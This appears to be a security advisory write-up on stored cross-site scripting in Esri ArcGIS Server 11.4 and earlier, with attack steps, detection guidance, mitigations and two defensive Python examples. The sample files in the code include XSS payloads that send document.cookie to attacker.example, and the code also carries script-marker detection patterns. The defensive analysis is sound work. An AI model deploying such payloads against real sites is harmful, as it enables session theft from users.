Source: psirt@esri.com
There is a stored cross-site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser.
Esri ArcGIS Server 11.4 and earlier is vulnerable to stored cross-site scripting (XSS): in affected configurations, an attacker with no credentials can store a file containing script on the server, and the server later delivers that file to other users in a form their browser renders. The script runs in the victim's browser within the ArcGIS Server origin, so it can act with the victim's session, which can lead to account takeover and exfiltration of data the victim can access. Note the qualifier in the advisory: exploitability depends on configuration, so not every 11.4-and-earlier deployment is reachable by an unauthenticated attacker.
Step 1: Payload creation. The attacker prepares a file whose content a browser will treat as active content, for example HTML or SVG carrying script. The script does whatever the attacker wants done as the victim: read cookies or tokens exposed to script, call the server's endpoints with the victim's session, or redirect the victim to a phishing page.
Step 2: File upload. The attacker submits the file to an upload endpoint that, in the affected configurations, accepts it without authentication. The server does not reject the file on the basis of its type or content.
Step 3: File storage. The server stores the file and makes it retrievable through a URL on its own origin.
Step 4: Victim interaction. A legitimate user opens that URL, directly or because a map service, web application or other ArcGIS Server resource references it.
Step 5: Payload execution. The server returns the stored file with a content type the browser renders rather than downloads; the browser parses it as a document and runs the embedded script with the victim's cookies and permissions for the ArcGIS Server origin.
The vulnerability stems from insufficient validation of user-supplied files: the server accepts uploaded content without enforcing that it is of a type that cannot carry script, and then serves it back in a way a browser will render. Two conditions have to hold for a stored file to become XSS rather than a harmless download: the file must be retrievable from the same origin the victim is already authenticated to, and the response must carry a browser-renderable content type (text/html, image/svg+xml and similar) without a Content-Disposition: attachment header forcing a download. The advisory does not say which of these the fix addresses; in general the control is an allow list of non-active file types at upload time, combined at serving time with safe response headers (nosniff, forced download, a restrictive CSP) or a separate, cookie-less origin for user content. Because the file persists on the server, the payload is delivered to every user who later opens it, which is what makes this stored rather than reflected XSS.
No specific threat actor is linked to this issue at the time of writing. Unauthenticated, persistent XSS on an internet-facing GIS server is useful to any attacker who wants a foothold in an organisation's sessions, so both state-sponsored and financially motivated actors are plausible users of it once a working payload is public. Inclusion in the CISA KEV catalog requires evidence of exploitation in the wild, which this advisory does not report; do not wait for a KEV listing before patching.
Network traffic analysis: Look for HTTP POST or PUT requests to upload endpoints from unauthenticated sources whose bodies carry HTML, SVG or XML content, and for subsequent GET responses from the server that deliver such content with a text/html or image/svg+xml Content-Type. TLS termination at a proxy is needed to see either.
File system monitoring: Watch the directories where ArcGIS Server stores uploaded content for new files with active-content extensions (.html, .htm, .svg, .xml, .js) and for files whose extension does not match their content, such as a .png that begins with <html or <svg.
Web application firewall (WAF) logs: Review blocked and allowed requests for XSS signatures (<script, on*= handlers, javascript: URIs) in upload bodies; a WAF that only inspects URL and form parameters may miss multipart file content.
Intrusion detection system (IDS) alerts: Write rules for the same markers in HTTP request bodies and in responses from the server, keyed on the server's upload and content paths.
Endpoint Detection and Response (EDR) monitoring: EDR does not see script running inside a browser tab, so look for the follow-on effects instead, such as browser processes opening connections to hosts the organisation does not use shortly after a visit to the ArcGIS Server.
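The file-system and log checks above, as an added example that is not part of the advisory and not Esri's code. It scans stored files for active content (by extension, by script markers regardless of extension, and by image magic bytes that contradict the extension) and pulls successful unauthenticated POST/PUT requests to an upload path out of Apache combined-format log lines. The upload prefix `/uploads`, the file names and contents, and the log lines are all constructed for the example; real ArcGIS Server paths will differ.

```python
"""Detection helpers for stored active content on a web server.

Added example, not Esri's code: the log format is Apache combined, and the
upload path, file names and file contents are constructed for the example."""
import os
import re
from dataclasses import dataclass, field
from typing import Optional

# Markers that make a stored file dangerous if a browser renders it inline.
SCRIPT_MARKERS = {
    "script_tag":     re.compile(rb"<\s*script\b", re.I),
    "event_handler":  re.compile(rb"\bon[a-z]+\s*=", re.I),
    "javascript_uri": re.compile(rb"javascript\s*:", re.I),
    "svg_root":       re.compile(rb"<\s*svg\b", re.I),
    "html_root":      re.compile(rb"<\s*(html|body|iframe|object|embed)\b", re.I),
}
ACTIVE_EXTS = {".html", ".htm", ".xhtml", ".svg", ".xml", ".js", ".mht", ".mhtml"}
# Magic bytes for the image types a typical upload allow list admits.
IMAGE_MAGIC = {
    ".png":  (b"\x89PNG\r\n\x1a\n",),
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif":  (b"GIF87a", b"GIF89a"),
}


@dataclass
class Finding:
    path: str
    reasons: list = field(default_factory=list)


def scan_stored_file(path: str, data: bytes) -> Optional[Finding]:
    """Flags a stored file that is active content by extension, carries script
    markers regardless of extension, or claims an image type its bytes contradict."""
    ext = os.path.splitext(path)[1].lower()
    reasons = [name for name, rx in SCRIPT_MARKERS.items() if rx.search(data)]
    if ext in ACTIVE_EXTS:
        reasons.append("active_extension")
    magic = IMAGE_MAGIC.get(ext)
    if magic and not data.startswith(magic):
        reasons.append("extension_magic_mismatch")
    return Finding(path, reasons) if reasons else None


def scan_stored_files(files: dict) -> dict:
    """files maps path -> content (e.g. read from the upload directory).
    Returns path -> reasons for every file that should be reviewed or quarantined."""
    out = {}
    for path, data in files.items():
        finding = scan_stored_file(path, data)
        if finding:
            out[path] = finding.reasons
    return out


# Apache combined log format: ip ident user [time] "METHOD path proto" status size ...
LOG_RX = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')


def suspicious_upload_requests(lines, upload_prefixes=("/uploads",)):
    """Returns (ip, path, status) for successful POST/PUT requests to an upload
    path with no authenticated user in the log. The user field only reflects
    HTTP auth, so treat a hit as a lead to confirm in application logs."""
    hits = []
    for line in lines:
        m = LOG_RX.match(line)
        if not m or m["method"] not in ("POST", "PUT"):
            continue
        if not m["path"].startswith(upload_prefixes) or not m["status"].startswith("2"):
            continue
        if m["user"] == "-":
            hits.append((m["ip"], m["path"], m["status"]))
    return hits


# Constructed sample data (not real ArcGIS Server paths, files or logs).
SAMPLE_FILES = {
    "uploads/41/photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    "uploads/42/report.html": b"<html><body onload=\"fetch('https://attacker.example/?c='+document.cookie)\"></body></html>",
    "uploads/43/logo.svg": b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(document.domain)</script></svg>',
    "uploads/44/icon.png": b"<script>alert(1)</script>",
}
SAMPLE_LOG = [
    '10.0.0.5 - - [12/May/2025:10:01:22 +0000] "POST /uploads?f=json HTTP/1.1" 200 98 "-" "curl/8.0"',
    '10.0.0.9 - alice [12/May/2025:10:02:10 +0000] "POST /uploads HTTP/1.1" 200 98 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [12/May/2025:10:03:01 +0000] "GET /uploads/42/report.html HTTP/1.1" 200 1204 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [12/May/2025:10:04:40 +0000] "POST /uploads HTTP/1.1" 403 12 "-" "python-requests/2.31"',
]

if __name__ == "__main__":
    for path, reasons in scan_stored_files(SAMPLE_FILES).items():
        print(f"{path}: {', '.join(reasons)}")
    for ip, path, status in suspicious_upload_requests(SAMPLE_LOG):
        print(f"unauthenticated upload from {ip} to {path} ({status})")
```

Run it against a walk of the real upload directory and a tail of the access log; the image magic check is what catches the icon.png case, a file whose extension passes an allow list but whose bytes are HTML, which is the case a name-only filter misses.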
Upgrade to ArcGIS Server 11.5 or later. This is the primary and most effective remediation step.
Place a Web Application Firewall (WAF) in front of the server and enable rules that inspect multipart upload bodies for script markers; treat this as a stopgap that reduces exposure until the upgrade is done, not as a fix.
Restrict what can be uploaded and how it is served: allow-list non-active file types, reject files whose content does not match their declared type, and serve stored files with X-Content-Type-Options: nosniff and Content-Disposition: attachment, or from a separate origin that carries no session cookies.
Regularly scan the directories where ArcGIS Server stores uploaded content for files with active-content extensions or script markers, and remove anything that did not come from a known source.
Review and harden the ArcGIS Server configuration, in particular any setting that lets anonymous users upload content, and disable features and services that are not needed.
Set a Content Security Policy on responses that serve user-supplied content, for example a sandbox directive or a script-src that excludes inline script, so that a stored file cannot run script even if it is rendered.
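The root-cause discussion and the upload and serving controls in the list above, as an added example that is not part of the advisory and not Esri's code. It shows a generic upload-and-serve path in its vulnerable form (stored file returned inline with a type guessed from its name) beside a hardened form (extension allow list at upload, active types downgraded, nosniff, forced download and a sandboxing CSP at serving), and a simplified model of when a browser would run script from a response, so both paths can be checked. The handler names, `UPLOAD_ALLOWLIST` and the sample files are assumptions made for the example.

```python
"""Vulnerable versus hardened serving of user-uploaded files.

Added example, not Esri's code: the handlers, UPLOAD_ALLOWLIST and the browser
model are illustrative and assume a generic upload-and-serve endpoint."""
import mimetypes
import os
import re
from dataclasses import dataclass

# Content types a browser renders as a document that can run script when it
# navigates to the URL directly (same origin, with the user's cookies).
ACTIVE_TYPES = {"text/html", "application/xhtml+xml", "image/svg+xml",
                "text/xml", "application/xml"}
# Hypothetical allow list for the upload endpoint: no HTML, SVG, XML or JS.
UPLOAD_ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif", ".pdf", ".zip", ".csv", ".json", ".txt"}
TEXT_EXTS = {".csv", ".json", ".txt"}
SCRIPT_RX = re.compile(rb"<\s*script\b|\bon[a-z]+\s*=|javascript\s*:", re.I)


@dataclass
class Response:
    status: int
    headers: dict
    body: bytes


def safe_name(filename: str) -> str:
    """Strip directory components and anything outside a conservative charset."""
    return re.sub(r"[^A-Za-z0-9._-]", "_", os.path.basename(filename))


def serve_vulnerable(filename: str, data: bytes) -> Response:
    """Returns the stored file inline with a type guessed from its name.
    A stored report.html or icon.svg becomes a same-origin document, so any
    script inside it runs with the victim's session: the bug class on this page."""
    ctype = mimetypes.guess_type(filename)[0] or "application/octet-stream"
    return Response(200, {"Content-Type": ctype}, data)


def validate_upload(filename: str, data: bytes) -> str:
    """Upload-time control: allow-list the extension and refuse text-like files
    that carry script markers. Returns the sanitised name or raises ValueError."""
    name = safe_name(filename)
    ext = os.path.splitext(name)[1].lower()
    if ext not in UPLOAD_ALLOWLIST:
        raise ValueError(f"extension not allowed: {ext or '(none)'}")
    if ext in TEXT_EXTS and SCRIPT_RX.search(data):
        raise ValueError("text upload contains script markers")
    return name


def upload_accepted(filename: str, data: bytes) -> bool:
    """True if validate_upload would accept the file."""
    try:
        validate_upload(filename, data)
        return True
    except ValueError:
        return False


def serve_hardened(filename: str, data: bytes) -> Response:
    """Serving-time control: the same bytes, never renderable as active content
    in the application's origin. Active types are downgraded to octet-stream,
    sniffing is disabled, the response is forced to a download, and a sandboxing
    CSP is attached for any client that still displays it."""
    name = safe_name(filename)
    ctype = mimetypes.guess_type(name)[0] or "application/octet-stream"
    if ctype in ACTIVE_TYPES:
        ctype = "application/octet-stream"
    headers = {
        "Content-Type": ctype,
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{name}"',
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }
    return Response(200, headers, data)


def browser_executes_script(resp: Response) -> bool:
    """Simplified model of a browser opening the response as a top-level document.
    Script runs only if the body has script markers, the type is active, the
    response is not a forced download, and no CSP forbids script. Real browsers
    have more rules; this captures the ones the headers above target."""
    if not SCRIPT_RX.search(resp.body):
        return False
    h = {k.lower(): v for k, v in resp.headers.items()}
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    if ctype not in ACTIVE_TYPES:
        return False
    if h.get("content-disposition", "").lower().startswith("attachment"):
        return False
    csp = h.get("content-security-policy", "").lower()
    if "sandbox" in csp and "allow-scripts" not in csp:
        return False
    if "script-src 'none'" in csp or ("default-src 'none'" in csp and "script-src" not in csp):
        return False
    return True


# Constructed samples: what an attacker would store, and a benign image.
EVIL_HTML = (b"<html><body><script>fetch('https://attacker.example/?c='"
             b" + document.cookie)</script></body></html>")
EVIL_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg">'
            b'<script>alert(document.domain)</script></svg>')
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    for fname, data in (("report.html", EVIL_HTML), ("icon.svg", EVIL_SVG)):
        print(fname, "accepted at upload:", upload_accepted(fname, data))
        print("  vulnerable serving runs script:", browser_executes_script(serve_vulnerable(fname, data)))
        print("  hardened serving runs script:  ", browser_executes_script(serve_hardened(fname, data)))
```

The two controls are deliberately independent: the allow list stops the obvious .html and .svg uploads, while the serving headers protect files that slipped past it or were already on disk before the filter existed, which is why an upgrade should be followed by a scan of existing stored content.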